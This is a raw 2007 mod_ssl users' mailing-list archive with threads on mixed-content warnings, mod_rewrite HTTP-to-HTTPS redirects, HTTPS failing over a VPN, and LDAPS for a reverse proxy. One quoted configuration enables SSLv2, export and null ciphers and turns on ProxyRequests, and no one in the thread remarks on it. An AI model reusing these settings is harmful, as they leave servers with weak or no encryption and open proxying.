X-List-Name: modssl-users This is a multi-part message in MIME format. --g55oQVFxAO3uuMYjNL2tPKeDndp7SveFnmHfcdC7ll1Pv===== Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Firefox will show you what links, images, etc are on a page and what protoco= l they are using (http or https) Kevin Klawon 203-675-5644 ------Original Mail------ From: "Yvo van Doorn" To: Sent: Wed, 19 Sep 2007 16:59:03 -0700 Subject: Re: Urgent help please Actually more specifically a web site development issue. You most likely have static links pointing to content in your web development code (html, css, php, whatever language they have). mod_rewrite doesn't rewrite your actual code, you need to do that. An *example* would be . When you attempt to access this on a secure page a certain web browser (HINT: IE) goes all nutty and complains like you mention in your original request. This is definitely not the correct place for the problem you experience. A good & decent google search would've clued you in on any of this. I highly suggest this website on how to use Google: http://www.googleguide.com/ On 9/19/07, a k wrote: > Pretty sure that is a browser issue and not a web site issue. > > > Lindsay Hausner wrote: > > > -----Original Message----- > From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]= > On Behalf Of Jones, Stephen (SJONES) > Sent: Friday, August 03, 2007 10:16 AM > To: modssl-users@modssl.org > Subject: Urgent help please > > Hello, > > My site just did a redesign and now the SSL's do not work as desired > and I have no clue why. > > Here is the scenario: > > The Home page on initial connection is NOT using SSL. > > I can select any noon SSL page and remain a noon SSL page > > I select one of the 2 SSL pages and I get SSL (ie: https in the address > bar and the lock icon in the browser) > > From this point on every page is now defined as SSL. I see this by > picking > any link on the page and the link displayed in the lower left corner is > listed as https. If I choose the link the address bar is https and the > lock icon appears. > > The problem is that if I choose any of the links back to the Home page I > get the POP up "This page contains both secure and non secure item." > > The address bar stays as https but the lock icon disappears. > > No changes were made to the httpd.conf or ssl.conf files. > > I have the following redirects in place and I can see the first 2 > working when I enable rewrite logging. > > I never see the 3rd one run. > > RewriteCond %{HTTPS} !=3Don > RewriteCond %{REQUEST_URI} ^.*/cf/store/.* > RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] > > > ## For Digsig > RewriteCond %{HTTPS} !=3Don > RewriteCond %{REQUEST_URI} ^.*/cf/digsig/.* > RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] > > ## For Everything Else > RewriteCond %{HTTPS} =3Don > RewriteCond %{REQUEST_URI} ^.*/.* > RewriteRule ^/(.*) http://%{SERVER_NAME}/$1 [L,R] > > Any suggestions as to what or where to look would be greatly > appreciated. > > Sorry for the delay. > > "This page contains both secure and non secure item." means there are url > paths in page oontent (usually graphics...image sources for links and the > like) which are http (and need to be https). I'm not to familiar w/ > mod_rewrite, but a guess is that your rules apply to actual links, but not= > urls for content such as .gif or .jpg files. > > Hope this helps. > > lh.. > > > > > ________________________________ > Moody friends. Drama queens. Your life? Nope! - their life, your story. > Play Sims Stories at Yahoo! Games. > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org --g55oQVFxAO3uuMYjNL2tPKeDndp7SveFnmHfcdC7ll1Pv===== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Firefox will show you what links, images, etc are on a page and what prot= ocol they are using (http or https)

Kevin Klawon
203-675-5644


------Original Mail------
From= : "Yvo van Doorn" <yvo.vandoorn@gmail.com>
To: <modssl-users@mod= ssl.org>
Sent: Wed, 19 Sep 2007 16:59:03 -0700
Subject: Re: Urgent = help please

Actually more specifically a web site development issue. = You most
likely have static links pointing to content in your web develop= ment
code (html, css, php, whatever language they have). mod_rewrite
d= oesn't rewrite your actual code, you need to do that.

An *example* wo= uld be <img src=3D"http://www.example.com/example.jpg">.
When you a= ttempt to access this on a secure page a certain web browser
(HINT: IE) g= oes all nutty and complains like you mention in your
original request. Th= is is definitely not the correct place for the
problem you experience. A = good & decent google search would've clued
you in on any of this. I h= ighly suggest this website on how to use
Google: http://www.googleguide.c= om/

On 9/19/07, a k <you2bepie@yahoo.com> wrote:
> Pretty= sure that is a browser issue and not a web site issue.
>
>
&= gt; Lindsay Hausner <lindsay.hausner@comodo.com> wrote:
>
>= ;
> -----Original Message-----
> From: owner-modssl-users@modssl= .org [mailto:owner-modssl-users@modssl.org]
> On Behalf Of Jones, Step= hen (SJONES)
> Sent: Friday, August 03, 2007 10:16 AM
> To: mods= sl-users@modssl.org
> Subject: Urgent help please
>
> Hell= o,
>
> My site just did a redesign and now the SSL's do not work= as desired
> and I have no clue why.
>
> Here is the scen= ario:
>
> The Home page on initial connection is NOT using SSL.<= BR>>
> I can select any noon SSL page and remain a noon SSL page>
> I select one of the 2 SSL pages and I get SSL (ie: https in th= e address
> bar and the lock icon in the browser)
>
> From= this point on every page is now defined as SSL. I see this by
> picki= ng
> any link on the page and the link displayed in the lower left cor= ner is
> listed as https. If I choose the link the address bar is http= s and the
> lock icon appears.
>
> The problem is that if = I choose any of the links back to the Home page I
> get the POP up "Th= is page contains both secure and non secure item."
>
> The addre= ss bar stays as https but the lock icon disappears.
>
> No chang= es were made to the httpd.conf or ssl.conf files.
>
> I have the= following redirects in place and I can see the first 2
> working when= I enable rewrite logging.
>
> I never see the 3rd one run.
&= gt;
> RewriteCond %{HTTPS} !=3Don
> RewriteCond %{REQUEST_URI} ^= .*/cf/store/.*
> RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R]>
>
> ## For Digsig
> RewriteCond %{HTTPS} !=3Don
&= gt; RewriteCond %{REQUEST_URI} ^.*/cf/digsig/.*
> RewriteRule ^/(.*) h= ttps://%{SERVER_NAME}/$1 [L,R]
>
> ## For Everything Else
>= ; RewriteCond %{HTTPS} =3Don
> RewriteCond %{REQUEST_URI} ^.*/.*
&g= t; RewriteRule ^/(.*) http://%{SERVER_NAME}/$1 [L,R]
>
> Any sug= gestions as to what or where to look would be greatly
> appreciated.>
> Sorry for the delay.
>
> "This page contains both= secure and non secure item." means there are url
> paths in page oont= ent (usually graphics...image sources for links and the
> like) which = are http (and need to be https). I'm not to familiar w/
> mod_rewrite,= but a guess is that your rules apply to actual links, but not
> urls = for content such as .gif or .jpg files.
>
> Hope this helps.
= >
> lh..
>
>
>
>
> __________________= ______________
> Moody friends. Drama queens. Your life? Nope! - their= life, your story.
> Play Sims Stories at Yahoo! Games.
>
>= ;
______________________________________________________________________<= BR>Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mail= ing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.= org

--g55oQVFxAO3uuMYjNL2tPKeDndp7SveFnmHfcdC7ll1Pv=====-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Sep 26 15:31:43 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 619B514D889; Wed, 26 Sep 2007 15:31:43 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.185]) by master.modssl.org (Postfix) with ESMTP id 24EBF14D82E for ; Wed, 26 Sep 2007 15:31:40 +0200 (CEST) Received: by rv-out-0910.google.com with SMTP id k20so2008392rvb for ; Wed, 26 Sep 2007 06:31:38 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:mime-version:content-transfer-encoding:message-id:content-type:to:from:subject:date:x-mailer; bh=4L0+PShLrsXH3IdW7ZXK0oQzU/t4PfP2F+kGZ024qoE=; b=jul0IxQGNRzvPohWH8I1bqsVlY7RiOUQyvVoZ/UAjdTsyduRuFd7RELIAlv4HiJTsNBhWPgvbOqTYU8v05zVR/bJNmXgPl76aTwSafLzE4XorgbilQFOG8Oh6doDRxib10rM8JjSpv+fHryhgouI8l6b1CiczlvSezYiw0iq3Ac= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:mime-version:content-transfer-encoding:message-id:content-type:to:from:subject:date:x-mailer; b=jnIyCa2gL4PRTUYx4Yj/6b/qBA291tYsS0mc++4ew/bvupDR1j8/VBmHaGubna6yRXCqp0zW4mGsu6r+rf0eEpSUM7BoWR6a+H5iDzpVB2TOobih20i2fmpYmmWnU0s9wSyv7sE0Vm6PTNQYGa8aPZTMC5KV4pKSwNYDzBTPcBA= Received: by 10.114.120.1 with SMTP id s1mr917005wac.1190813497810; Wed, 26 Sep 2007 06:31:37 -0700 (PDT) Received: from ?192.168.11.3? ( [203.165.58.135]) by mx.google.com with ESMTPS id m6sm884420wag.2007.09.26.06.31.34 (version=SSLv3 cipher=OTHER); Wed, 26 Sep 2007 06:31:36 -0700 (PDT) Mime-Version: 1.0 (Apple Message framework v752.3) Content-Transfer-Encoding: 7bit Message-Id: <2B3B8594-B09E-4BBE-A7E8-1F547F1387AE@gmail.com> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed To: modssl-users@modssl.org From: David Zentgraf Subject: HTTPS connection error via tunnel Date: Wed, 26 Sep 2007 22:31:12 +0900 X-Mailer: Apple Mail (2.752.3) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Zentgraf X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hi, We've got an Intranet Apache server which hosts a service on port 443, with a pretty run of the mill configuration. Connections work perfectly fine when inside the office. We now set up a Hamachi VPN to allow our devs access to the server from outside as well. SSH, file sharing, standard port 80 services etc all work perfectly, only HTTPS connections to the box fail. Browsers simply state they couldn't establish a secure connection. Curl gives me: kk:~ deceze$ curl -v https://uu.local/ * About to connect() to uu.local port 443 * Trying 5.124.xx.xxx... connected * Connected to uu.local (5.124.xx.xxx) port 443 * successfully set certificate verify locations: * CAfile: /opt/local/share/curl/curl-ca-bundle.crt CApath: none * SSLv2, Client hello (1): Unknown SSL protocol error in connection to uu.local:443 * Closing connection #0 curl: (35) Unknown SSL protocol error in connection to uu.local:443 These connections attempts don't even make it into the logs, any of them. What's going on here? Why is the VPN preventing SSL connections? I'm afraid this may be on a level below mod_ssl, but I don't know where to look anymore. Any ideas would be appreciated. Best Regards, Dav ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Sep 27 08:23:05 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id C628B14D889; Thu, 27 Sep 2007 08:23:05 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from vitufe.telintrans.fr (messager.telintrans.com [84.37.93.253]) by master.modssl.org (Postfix) with ESMTP id BC37314D83B for ; Thu, 27 Sep 2007 08:23:04 +0200 (CEST) Received: from lituf69.tlt (10.37.19.4) by vitufe.telintrans.fr (MX V5.1-A An6s) with ESMTP for ; Thu, 27 Sep 2007 08:22:06 +0200 Received: from lituf69.tlt (localhost [127.0.0.1]) by lituf69.tlt (8.12.11.20060308/8.12.11) with ESMTP id l8R6NqZk016513 for ; Thu, 27 Sep 2007 08:23:52 +0200 Received: from VITUF3.tlt (vituf3.tlt [10.37.13.3]) by lituf69.tlt (8.12.11.20060308/8.12.11) with ESMTP id l8R6Nqx0016510 for ; Thu, 27 Sep 2007 08:23:52 +0200 Received: from domino-tuf-1.telintrans.fr (10.37.15.132) by VITUF3.tlt (MX V5.1-A An6s) with ESMTP for ; Thu, 27 Sep 2007 08:23:02 +0200 Subject: reverse proxy with ldap authentication X-Mailer: Lotus Notes Release 8.0 August 02, 2007 Message-ID: From: roberto.ramos@telintrans.fr Date: Thu, 27 Sep 2007 08:28:35 +0200 X-MIMETrack: Serialize by Router on domino-tuf-1.telintrans.fr/TELINTRANS/FR(Release 6.5.1|January 21, 2004) at 27/09/2007 08:28:40 MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII To: undisclosed-recipients:; Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: roberto.ramos@telintrans.fr X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hi all, I try to install a reverse proxy with ldap authentication : it works with ldap but not with ldaps. I've got this notice about LDAP and SSL in the log [Wed Sep 26 16:57:40 2007] [notice] LDAP: Built with OpenLDAP LDAP SDK [Wed Sep 26 16:57:40 2007] [notice] LDAP: SSL support unavailable [Wed Sep 26 16:57:40 2007] [notice] Apache/2.0.52 (Red Hat) configured -- resuming normal operations Any help would be appreaciated. Thx Roberto ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Oct 11 04:35:13 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 4344514DA22; Thu, 11 Oct 2007 04:35:13 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from alnrmhc13.comcast.net (alnrmhc13.comcast.net [204.127.225.93]) by master.modssl.org (Postfix) with ESMTP id F27E314D841 for ; Thu, 11 Oct 2007 04:35:08 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (alnrmhc13) with ESMTP id <20071011023455b13000guvge>; Thu, 11 Oct 2007 02:35:05 +0000 Message-ID: <470D8BCE.7020000@comcast.net> Date: Wed, 10 Oct 2007 22:34:54 -0400 From: Bernard Barton User-Agent: Thunderbird 2.0.0.5 (X11/20070727) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: How to redirect http to https on same server? Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bernard Barton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I'm trying to redirect users from http://vhost.mydomain.com to https://vhost.mydomain.com using this RewriteRule: RewriteCond %{SERVER_PORT} !^443$ RewriteRule ^/(.*)$ https://cj-mydomain.choicepoint.net/$1 [L,R] This does not seem to work. I have the following defined as a virtual host, and the ssl.include is listed below that. What do I need to do to redirect http to https on the same server? -Thanks #See file below Include conf/conf.d/ssl.include ErrorLog /usr/local/apache/logs/ssl_mydomain_error_log CustomLog /usr/local/apache/logs/ssl_mydomain_access_log combined ProxyRequests On ProxyPass / http://vhost.mydomain.net:80/ ProxyPassReverse / http://vhost.mydomain.net:80/ ########################### ssl.include SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /usr/local/apache-1.3.37/conf/ssl.crt/star_mydomain_net.crt SSLCertificateKeyFile /usr/local/apache-1.3.37/conf/ssl.key/star_mydomain_net.key SSLCertificateChainFile /usr/local/apache-1.3.37/conf/ssl.crt/DigiCertCA.crt SSLOptions +StdEnvVars SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Oct 11 15:50:01 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 54DDF14DA35; Thu, 11 Oct 2007 15:50:01 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from outbound03.telus.net (outbound03.telus.net [199.185.220.222]) by master.modssl.org (Postfix) with ESMTP id 7D3F314D841 for ; Thu, 11 Oct 2007 15:50:00 +0200 (CEST) Received: from priv-edtnaa05.telusplanet.net ([137.186.246.196]) by priv-edtnes79.telusplanet.net (InterMail vM.7.08.02.00 201-2186-121-20061213) with ESMTP id <20071011134957.FSRB29566.priv-edtnes79.telusplanet.net@priv-edtnaa05.telusplanet.net> for ; Thu, 11 Oct 2007 07:49:57 -0600 Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196]) by priv-edtnaa05.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP id B3KSFUR4LK for ; Thu, 11 Oct 2007 07:49:56 -0600 (MDT) Message-ID: <470E2A23.9090805@daltons.ca> Date: Thu, 11 Oct 2007 07:50:27 -0600 From: Aaron Dalton User-Agent: Thunderbird 2.0.0.6 (Windows/20070728) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: How to redirect http to https on same server? References: <470D8BCE.7020000@comcast.net> In-Reply-To: <470D8BCE.7020000@comcast.net> X-Enigmail-Version: 0.95.3 OpenPGP: id=8811D2A4; url=https://biglumber.com/x/web?qs=8811d2a4 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Aaron Dalton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Bernard Barton wrote: > I'm trying to redirect users from http://vhost.mydomain.com to > https://vhost.mydomain.com using this RewriteRule: I just use: RedirectPermanent / https://my.host.com - -- Aaron Dalton | Super Duper Games aaron@daltons.ca | http://superdupergames.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: My Key: http://biglumber.com/x/web?qs=8811d2a4 Comment: My Website: http://superdupergames.org Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkcOKiMACgkQvlYKTYgR0qTEtgCgwLPuqyWQAVhzzW1HqMlmINsT 8nMAn3YFo0IXz26eVTMmpWgQERT2jADQ =lPRb -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Oct 11 16:00:38 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 0B49314DA35; Thu, 11 Oct 2007 16:00:38 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from mail.nrlssc.navy.mil (mail1.nrlssc.navy.mil [128.160.35.1]) by master.modssl.org (Postfix) with ESMTP id 2E48E14D841 for ; Thu, 11 Oct 2007 16:00:36 +0200 (CEST) Received: from nms.nrlssc.navy.mil (localhost [127.0.0.1]) by mail.nrlssc.navy.mil (8.13.7/8.13.7) with ESMTP id l9BE0XD6009290 for ; Thu, 11 Oct 2007 09:00:33 -0500 Received: from [128.160.115.202] (kali.nrlssc.navy.mil [128.160.115.202]) by nms.nrlssc.navy.mil (8.12.10/8.12.10) with ESMTP id l9BE0WcZ011919 for ; Thu, 11 Oct 2007 09:00:33 -0500 (CDT) Message-ID: <470E2C7C.5020409@nrlssc.navy.mil> Date: Thu, 11 Oct 2007 09:00:28 -0500 From: "Roy Keene (Contractor)" Organization: Naval Research Laboratory User-Agent: Thunderbird 2.0.0.6 (X11/20070728) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: How to redirect http to https on same server? References: <470D8BCE.7020000@comcast.net> In-Reply-To: <470D8BCE.7020000@comcast.net> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-TM-AS-Product-Ver: : ISVW-6.0.0.2339-5.0.0.1023-15336001 X-TM-AS-Result: : Yes--13.624400-0-31-1 X-TM-AS-Category-Info: : 31:0.000000 X-TM-AS-MatchedID: : =?us-ascii?B?MTQ2MDA4LTE1MDU2Ny03MDAw?= =?us-ascii?B?NzUtMTM5MDEwLTcwNjg5MS03MTEyMTMtMTM5NzA0LTcwMDA3My03?= =?us-ascii?B?MDA0ODYtNzA1Mzg4LTcwMzM3OC03MDE1NzYtMTIxMzU1LTcwMDEw?= =?us-ascii?B?Ny03MDA5NzEtNzAxMzk1LTcwMTMwNS03MDk5MDgtNzAxMDc5LTE4?= =?us-ascii?B?ODAwNC03MDIxMDYtNzA3OTA0LTExMjA5MC03MDA3NTYtMTg2MjE3?= =?us-ascii?B?LTcwMjY0My0xMjE1MjMtNzA4MTk2LTcwMTI0OS03MDY3MjYtNzA0?= =?us-ascii?B?ODIwLTcwMjM1OC03MDQ0MTAtNzA1OTY5LTcwMDA0MC03MDQ0MjEt?= =?us-ascii?B?NzAyMDIwLTcwMjExMy03MDc3ODgtNzEwNDQyLTcwOTc3NC03MDE0?= =?us-ascii?B?NTUtMTA1MjUwLTcwMTIwMi03MDAxOTQtNzAyMTMxLTcwMTYwNC03?= =?us-ascii?B?MDcxNTEtNzA0NzUxLTcwMDA3Ny0xNDgwMzktMTQ4MDUxLTIwMDI1?= =?us-ascii?B?LTIwMDQz?= Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Roy Keene (Contractor)" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Bernard Barton wrote: > I'm trying to redirect users from http://vhost.mydomain.com to > https://vhost.mydomain.com using this RewriteRule: > > RewriteCond %{SERVER_PORT} !^443$ > RewriteRule ^/(.*)$ https://cj-mydomain.choicepoint.net/$1 [L,R] > > > This does not seem to work. I have the following defined as a virtual > host, and the ssl.include is listed below that. What do I need to do to > redirect http to https on the same server? > > -Thanks > > > > > > #See file below > Include conf/conf.d/ssl.include > > ErrorLog /usr/local/apache/logs/ssl_mydomain_error_log > CustomLog /usr/local/apache/logs/ssl_mydomain_access_log combined > > > ProxyRequests On > > ProxyPass / http://vhost.mydomain.net:80/ > ProxyPassReverse / http://vhost.mydomain.net:80/ > > > > > > > > > ########################### ssl.include > > SSLEngine on > > SSLCipherSuite > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > > SSLCertificateFile > /usr/local/apache-1.3.37/conf/ssl.crt/star_mydomain_net.crt > > SSLCertificateKeyFile > /usr/local/apache-1.3.37/conf/ssl.key/star_mydomain_net.key > > SSLCertificateChainFile /usr/local/apache-1.3.37/conf/ssl.crt/DigiCertCA.crt > > > SSLOptions +StdEnvVars > > > SetEnvIf User-Agent ".*MSIE.*" \ > nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > This is what I use (from internal documentation): 1. Redirect all HTTP requests to HTTPS a. Load mod_rewrite (see: http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html ) b. Add the following rule to your non-HTTPS server configuration (httpd.conf): # Require HTTPS RewriteEngine on RewriteRule ^/(.*) https://${SERVER_NAME}/$1 [redirect=permanent] Yours should work, too, though since it is only substantially different in two (2) ways: 1. You don't have "RewriteEngine on" in the snippet, I assume you have it somewhere though 2. You check SERVER_PORT against !^443$ (it would probably be better to check the environment variable HTTPS, though) -- that should work. -- Roy Keene (Contractor) Office of Network Management (Code 7030.8) Naval Research Laboratory Stennis Space Center, MS 39529 DSN 828-4827 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Oct 11 17:02:33 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id A9F3B14DA30; Thu, 11 Oct 2007 17:02:33 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from futfwa004.ut.afmc.af.mil (futfwa004.ut.afmc.af.mil [131.27.196.4]) by master.modssl.org (Postfix) with ESMTP id 4753014D841 for ; Thu, 11 Oct 2007 17:02:31 +0200 (CEST) Received: from FUTMLRL04 (futmlrl04.enterprise.afmc.ds.af.mil [131.27.201.158]) by futfwa004.ut.afmc.af.mil with ESMTP id l9BH07L9013962 for ; Thu, 11 Oct 2007 17:00:07 GMT X-AuditID: 831bc99e-000015d4000007c4-4b-470e3b037eb0 Received: from FUTMLBH04.Enterprise.afmc.ds.af.mil ([10.1.1.50]) by FUTMLRL04 with Microsoft SMTPSVC(6.0.3790.1830); Thu, 11 Oct 2007 09:02:27 -0600 Received: from VFUTMLAO01.Enterprise.afmc.ds.af.mil ([131.27.201.121]) by FUTMLBH04.Enterprise.afmc.ds.af.mil with Microsoft SMTPSVC(6.0.3790.2942); Thu, 11 Oct 2007 09:02:27 -0600 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: How to redirect http to https on same server? Date: Thu, 11 Oct 2007 09:02:25 -0600 Message-ID: <9757900F81C36649991D21EE05C634210142697E@VFUTMLAO01.Enterprise.afmc.ds.af.mil> In-Reply-To: <470E2C7C.5020409@nrlssc.navy.mil> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: How to redirect http to https on same server? Thread-Index: AcgMDyXsvbqvb08uRcqLtpcfqNEfbwAB8Sog References: <470D8BCE.7020000@comcast.net> <470E2C7C.5020409@nrlssc.navy.mil> From: "Walls Rob Contr 75 CS/SCBS" To: X-OriginalArrivalTime: 11 Oct 2007 15:02:27.0365 (UTC) FILETIME=[BCEF7550:01C80C17] X-Brightmail-Tracker: AAAAAA== Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Walls Rob Contr 75 CS/SCBS" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I use this in the port 80 virtual host (or main section) to refer any http request to https. The DocumentRoots should be the same or at least point to a similar file system structure in the http and ssl virtualhosts. It also informs proxies that it should cache the https version and not the http due to the 301 response code. RedirectMatch 301 (.*)$ https://servername.comain$1 =20 -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Roy Keene (Contractor) Sent: Thursday, October 11, 2007 8:00 AM To: modssl-users@modssl.org Subject: Re: How to redirect http to https on same server? Bernard Barton wrote: > I'm trying to redirect users from http://vhost.mydomain.com to=20 > https://vhost.mydomain.com using this RewriteRule: >=20 > RewriteCond %{SERVER_PORT} !^443$ > RewriteRule ^/(.*)$ https://cj-mydomain.choicepoint.net/$1 [L,R] >=20 >=20 > This does not seem to work. I have the following defined as a virtual > host, and the ssl.include is listed below that. What do I need to do=20 > to redirect http to https on the same server? >=20 > -Thanks >=20 >=20 > > >=20 > #See file below > Include conf/conf.d/ssl.include >=20 > ErrorLog /usr/local/apache/logs/ssl_mydomain_error_log > CustomLog /usr/local/apache/logs/ssl_mydomain_access_log=20 > combined >=20 > > ProxyRequests On >=20 > ProxyPass / http://vhost.mydomain.net:80/ > ProxyPassReverse / http://vhost.mydomain.net:80/ > =20 >=20 > >=20 > > >=20 >=20 > ########################### ssl.include >=20 > SSLEngine on >=20 > SSLCipherSuite > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL >=20 > SSLCertificateFile > /usr/local/apache-1.3.37/conf/ssl.crt/star_mydomain_net.crt >=20 > SSLCertificateKeyFile > /usr/local/apache-1.3.37/conf/ssl.key/star_mydomain_net.key >=20 > SSLCertificateChainFile=20 > /usr/local/apache-1.3.37/conf/ssl.crt/DigiCertCA.crt >=20 > > SSLOptions +StdEnvVars > >=20 > SetEnvIf User-Agent ".*MSIE.*" \ > nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 >=20 > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org >=20 This is what I use (from internal documentation): 1. Redirect all HTTP requests to HTTPS a. Load mod_rewrite (see: http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html ) b. Add the following rule to your non-HTTPS server configuration (httpd.conf): # Require HTTPS RewriteEngine on RewriteRule ^/(.*) https://${SERVER_NAME}/$1 [redirect=3Dpermanent] Yours should work, too, though since it is only substantially different in two (2) ways: 1. You don't have "RewriteEngine on" in the snippet, I assume you have it somewhere though 2. You check SERVER_PORT against !^443$ (it would probably be better to check the environment variable HTTPS, though) -- that should work. --=20 Roy Keene (Contractor) Office of Network Management (Code 7030.8) Naval Research Laboratory Stennis Space Center, MS 39529 DSN 828-4827 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Oct 12 01:52:44 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 92EE414DA2F; Fri, 12 Oct 2007 01:52:44 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from rwcrmhc13.comcast.net (rwcrmhc13.comcast.net [216.148.227.153]) by master.modssl.org (Postfix) with ESMTP id 52BD214D840 for ; Fri, 12 Oct 2007 01:52:42 +0200 (CEST) Received: from antares.bfbsystems.com (c-71-230-79-89.hsd1.pa.comcast.net[71.230.79.89]) by comcast.net (rwcrmhc13) with ESMTP id <20071011235238m1300odmsoe>; Thu, 11 Oct 2007 23:52:38 +0000 Message-ID: <470EB745.6010403@comcast.net> Date: Thu, 11 Oct 2007 